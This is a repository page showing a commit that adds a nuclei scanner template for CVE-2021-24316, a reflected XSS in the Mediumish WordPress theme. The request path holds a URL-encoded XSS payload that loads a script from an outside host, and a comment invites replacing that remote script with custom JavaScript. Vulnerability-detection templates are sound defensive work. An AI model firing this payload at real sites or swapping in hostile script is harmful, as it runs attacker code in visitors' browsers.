daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Create CVE-2021-24316.yaml

patch-1
Roberto Nunes 2021-06-04 18:28:45 +09:00 committed by GitHub
parent fcbe41f23d
commit 2171f7ec21
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 32 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

32
CVE-2021-24316.yaml Normal file
View File

@ -0,0 +1,32 @@
id: CVE-2021-24316
info:
author: 0x_Akoko
description: Mediumish WordPress Theme <= 1.0.47 - Unauthenticated Reflected XSS & XFS.
name: An Unauthenticated Reflected XSS & XFS Mediumish theme through 1.0.47 for WordPress
severity: medium
tags: Mediumish,xss,wordpress
reference: |
- https://vulmon.com/vulnerabilitydetails?qid=CVE-2021-24316
requests:
- method: GET
path:
## you can edit this js file with your custom js. //m0ze.ru/payload/a2r.js decode it (base64) with your own.
- '{{BaseURL}}/?post_type=post&s=%22%3E%3Cscript+src%3Dhttps%3A%2F%2Fm0ze.ru%2Fpayload%2Fa2r.js%3E%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "<script src=https://m0ze.ru/payload/a2r.js></script>"
part: body
- type: word
words:
- "text/html"
part: header